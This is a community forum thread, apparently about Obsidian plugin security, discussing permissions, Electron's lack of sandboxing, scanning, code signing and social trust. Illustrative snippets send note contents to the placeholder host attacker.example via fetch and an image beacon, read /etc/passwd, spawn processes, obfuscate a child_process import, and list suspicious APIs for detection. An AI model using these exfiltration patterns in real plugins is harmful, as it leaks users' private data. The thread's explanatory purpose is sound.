Security of the plugins

As a suggestion, permissions may be a good way to handle this (akin to how G Suite extensions work). A plugin can request read/write access, and the user has to accept the permissions model. Internet access is probably also something that should require the user’s permission.
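
Purely as an illustration (Obsidian’s actual manifest.json has no such field, and this is not a claim that it could be enforced), a declared permissions model might look something like this:

```ts
// Hypothetical only: Obsidian's manifest.json does not support a "permissions"
// field, and (as discussed below) Electron gives no way to enforce one.
interface HypotheticalPluginManifest {
  id: string;
  name: string;
  version: string;
  // Permissions the user would have to accept at install time.
  permissions?: Array<"vault:read" | "vault:write" | "network" | "clipboard">;
}

const example: HypotheticalPluginManifest = {
  id: "my-sync-plugin",
  name: "My Sync Plugin",
  version: "1.0.0",
  permissions: ["vault:read", "network"], // declared by the author, not enforced by anything
};
```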

On the other hand, pretty much every open-source tool that is considerably more dangerous (bash shells, Python, etc.) has this problem and no one cares. The user is responsible for deciding what they consider a trustworthy program/plugin. The simple answer is probably just to require that plugins be open-sourced.

Users should be able to choose closed-source plugins if they want. It’s their data, their files, their computers; they should be able to make their own choices about acceptable risks.

10 Likes

The problem is really this: within Electron, implementing (and enforcing) a permission model is either flat-out impossible (no matter the resources you have) or, if possible, extremely challenging (more so than building Obsidian itself).

There is no way in Electron to “containerize” plugin code execution and allow communication only through specific APIs. Once plugin code runs, it runs with access to everything, just like the main Obsidian code.

This issue would have to be managed at the Electron level. However, I would not be surprised if the Electron devs’ answer were: “We never intend to have segregated code execution in Electron.”
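
To make that concrete, here is a minimal sketch (assuming the desktop app, where the Electron renderer has Node integration, and the standard Obsidian Plugin API) of how an ordinary plugin’s onload can reach the filesystem and spawn processes just like the application’s own code:

```ts
import { Plugin } from "obsidian";
import * as fs from "fs";
import { execFile } from "child_process";

// Sketch only: a plugin is just code running in the same Electron process,
// so nothing stops it from using the full NodeJS API alongside Obsidian's API.
export default class FullAccessDemo extends Plugin {
  async onload() {
    // Read an arbitrary file far outside the vault.
    const passwd = fs.readFileSync("/etc/passwd", "utf8");
    console.log(passwd.length);

    // Spawn an arbitrary external program.
    execFile("whoami", (err, stdout) => console.log(err ?? stdout));
  }
}
```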

3 Likes

Please refer to my technical analysis from earlier on why this is impossible and only provides an illusion of security: Security of the plugins - #3 by Licat

2 Likes

This is not possible?!


Please focus more on the suggestion of trivial “social” security.

1 Like

It is not possible because there are many many many ways a plugin could connect to the internet:

  • By using the NodeJS http/https module
  • By using XMLHttpRequest browser API
  • By using the browser’s “fetch” API
  • By inserting an <img>, <audio>, <video>, or one of many other HTML elements with a src attribute, which makes the engine fetch a URL as if it were some kind of resource
  • By inserting an <iframe>, opening a new BrowserWindow, etc., which can open any page on the internet
  • By adding a CSS property such as background-image or font-family, which will fetch those resources from any URL
  • By executing another executable on your computer, such as wget, using the child_process NodeJS module
  • By storing a script in an auto-run location such as .bashrc, using the fs NodeJS module
  • And many, many more; possibly hundreds of other methods that we are not even aware of

This is a huge attack surface. While we could plug those holes one by one and cripple the ability of plugins to do useful work, you can’t account for the unknown ways a malicious actor will be able to exploit the system.
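
For illustration, here is roughly how little code two of the vectors above require (attacker.example is a placeholder, not a real endpoint):

```ts
// Sketch only: two of the exfiltration vectors listed above.

// 1. The browser fetch API: a one-liner that ships data to any URL.
fetch("https://attacker.example/collect", {
  method: "POST",
  body: JSON.stringify({ secret: "contents of a note" }),
});

// 2. An <img> element: merely setting src makes the engine issue a GET request,
// so data can be smuggled out in the query string without any explicit network call.
const img = document.createElement("img");
img.src = "https://attacker.example/pixel.png?d=" + encodeURIComponent("contents of a note");
document.body.appendChild(img);
```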

10 Likes

For sure, a great list. I think you’ll see most of these in due time!

5 Likes

Thanks for the analysis!

  • The biggest and easiest-to-close security holes should be closed
  • “Less critical” vectors should be monitored by Obsidian (I think it is relatively easy to monitor which potentially dangerous classes a plugin uses; a naive sketch of such a scan follows this list)
  • It would be nice to find some smart, fully automated way to use the output of this class/function monitoring and present a simple 1-2-3 summary of what the plugin can potentially do (based on the classes/functions it uses)

  • When a plugin uses potentially insecure classes/functions (like the ones you listed above), it should be installable only after the user explicitly grants access and is aware of the risks (this should be managed by the “plugin market” installation process)
  • By restricting some of the approaches you mentioned above, you get more “control” as a side effect: plugins will be written in a more uniform way, since there will not be many ways to achieve what the plugin developer wants
  • A list of good practices for writing plugins should be created by the devs
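
As a naive sketch of the fully automated class/function scan suggested above (hypothetical names; it simply searches a plugin’s bundled source for suspicious identifiers), something like this would catch the honest cases, though, as noted later in the thread, obfuscated code slips right past it:

```ts
import * as fs from "fs";

// Naive sketch of the suggested "class/function monitoring":
// flag plugin source that mentions obviously powerful APIs.
const SUSPICIOUS = [
  "child_process",
  "require('fs')",
  'require("fs")',
  "XMLHttpRequest",
  "fetch(",
  "BrowserWindow",
];

export function scanPluginSource(path: string): string[] {
  const source = fs.readFileSync(path, "utf8");
  return SUSPICIOUS.filter((needle) => source.includes(needle));
}

// Example: scanPluginSource(".obsidian/plugins/some-plugin/main.js")
// might return ["child_process", "fetch("].
```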

Believe me, the plugin market will be huge, especially in the future with paid plugins. Plugins will be one of the main strengths of Obsidian, as they can enhance its functionality exponentially…

  • Without high-quality plugins,
  • without ensuring best practices when writing them,
  • and without some restrictions and built-in security aspects in the API,

some plugin can really cast a bad image on Obsidian… you know the internet and the average user…

Don’t neglect plugins; they can become one of your sources of funding…
Just look at the Apple App Store and Google Play Store… they are a gold mine for Apple and Google now.

3 Likes

Thanks for the suggestion. We’ll try our best to keep everyone safe!

10 Likes

Here are some important takeaways for me:

  1. Using Obsidian is optional
  2. Obsidian is currently free. Rewarding the developers is optional
  3. Installing plugins is optional

I want to say that I’m in awe @Licat and @Silver at the quality of what you are creating and the pace of your development. I get that you are trying to create a safe and awesome project. I’m grateful and I’m using Obsidian all day long, every day!

46 Likes

Totally agree. I was just throwing out a suggestion, but honestly I think it’s not worth the effort at this point. You’d be plugging a bunch of holes while “hoping” to guarantee security, but as any security professional knows, having an informed user is the best defence.

The more scalable solution is to have a community-inspectable repository for non-official plugins. Open-source will make it easier to inspect for security holes. In the future, maybe a paid model will work but it’s way too much work to do that now.

I took a cursory look at the Electron security guidance, and it seems like there are basic controls for protecting the main application but nothing about plugins. (Not sure I fully understand it, though.) I’m a C++, data, ML, DevOps person lol

If I understand the issue correctly, it would be very misleading to provide such information, because it’s impossible to properly detect all the cases in which a plugin has access to something.

And if you try to detect just some cases, this will lure users into a false sense of security: “oh, it says it can access only these, I’m fine.” We can argue about it, but I would prefer the application to honestly say “sorry, we have no idea what that plugin can do” than to try to guess and fail.

On the other hand, pure social features like comments and ratings are good suggestions that would help a lot (though, even they are not without possible hacks).

7 Likes

@ryanjamurphy I think you’re exactly right. The social aspect, along with the fact that plugin source code (since I believe it is not compiled) is always “readable” by the community members who do understand the code, will probably allow the community to sniff things out.

I think it’s a good rule of thumb for non-coders like me not to install any plugin unless you see some kind of endorsement (e.g., a 10+ like count) from forum members, among whom someone is bound to understand the code.

3 Likes

Curious, has the community come to a consensus on 3rd-party plugins concerning security?

1 Like

Question of trust, I guess.

1 Like

How do you mean? Many plugins have been developed and can be inspected on the community plugin gallery in-app or on Github. Some have 20k+ installs.

I was just curious, as all the above discussion kind of just ended, so I presumed the answer was “self code audit”. I personally don’t know any of the programming languages used with Obsidian, therefore inspecting the plugin code doesn’t work for me. :expressionless:

Just my two-cents on what might be the best balance:

Something as simple as using GPG PKI might be the best bang for the buck in terms of security versus effort. Granted, I wouldn’t really start this journey until a 1.0 release is closer to being scheduled. Maybe something like the following could work if the devs choose to go down that path.

  • The devs create a GPG key pair.
  • Plugin authors request a code audit of their plugin (the devs may charge a fee for this). There could be a path for providing a binary plugin, but that would require more effort and more money.
  • Once the plugin is vetted, a digest and GPG signature are created. The plugin is packaged (just as an example) in the asar format and hosted on the devs’ plugin delivery system. We would therefore have a cryptographically authenticated, trusted plugin.
  • Obsidian ships with the public key, which can check the signature of the digest to ensure that the plugin has not been modified, possibly doing random checks throughout (a rough sketch of this check follows the list).
  • Provide an option in the community plugins section to allow “vetted” third-party plugins. (Maybe the mobile version of Obsidian could provide an option for using the vetted plugins.)
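
As a rough sketch of the verification step in this proposal (nothing Obsidian actually does; the file names and key handling are hypothetical, and gpg is assumed to be installed with the vendor’s public key already imported), the check could be as simple as shelling out to gpg:

```ts
import { execFile } from "child_process";

// Sketch only: verify a detached GPG signature over the packaged plugin.
// "plugin.asar" and "plugin.asar.sig" are hypothetical file names.
function verifyPluginSignature(asarPath: string, sigPath: string): Promise<boolean> {
  return new Promise((resolve) => {
    execFile("gpg", ["--verify", sigPath, asarPath], (err) => resolve(!err));
  });
}

// verifyPluginSignature("plugin.asar", "plugin.asar.sig").then((ok) =>
//   console.log(ok ? "signature valid" : "signature invalid or key not trusted")
// );
```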

(Honestly, the best option is to keep safe mode on and have the devs cook the features in natively. Just keep the current “turn off safe mode” option of prompting the user with a legal notice about not holding the devs liable for any mishaps, unintended or not.)

1 Like

I understand what you are proposing but I think you are missing the point here.

Here are the major points:

  1. Plugins can execute any code and are not limited to Obsidian’s API. Plugins are more like side-loaded applications. This is an Electron limitation: there is no mechanism to containerize part of the code. (VS Code has the same issue.)
  2. We do not have time to look at the source code of every plugin.
  3. Even if we looked at the code, there are a million-and-one ways to obfuscate and sneak in malicious code (see the example below).
  4. Even if we looked at the code once, the plugin author could insert malicious code in a subsequent update.
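
To illustrate point 3, a minimal example of trivial obfuscation: the string “child_process” never appears in the source, so a reviewer or an automated scan searching for it finds nothing:

```ts
// Sketch only: the module name is assembled at runtime, so the string
// "child_process" is never visible in the source.
const parts = ["child", "process"];
const cp = require(parts.join("_")); // effectively require("child_process")
cp.execFile("whoami", (err: unknown, out: string) => console.log(err ?? out));
// Real malicious code would hide far better than this (encoding, eval, remote payloads, …).
```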

This is not a technical problem about how to sign plugins. And we don’t want to certify anything, because that would give some users a sense of security that we know is not warranted.

We currently have in place one simple safeguard mechanism: if a plugin is known to cause problems, we can remotely disable it.

9 Likes

I do not disagree at all, and I understand that it all boils down to effort and time. I believe the clickwrap agreement is the best option at the moment.

I also think that while the number of installs and a developer’s reputation and involvement in the community are important for gauging things, it should be understood that many of the people doing these installs have their computers locked down pretty well.

So for an average user who does not consider the implications of what could potentially happen, some of this sense of trust and consistency could be misleading.

I think it is cool that the developers and moderators are so upfront about this. It has really made me question my computer security practices, and that is always a good thing.

3 Likes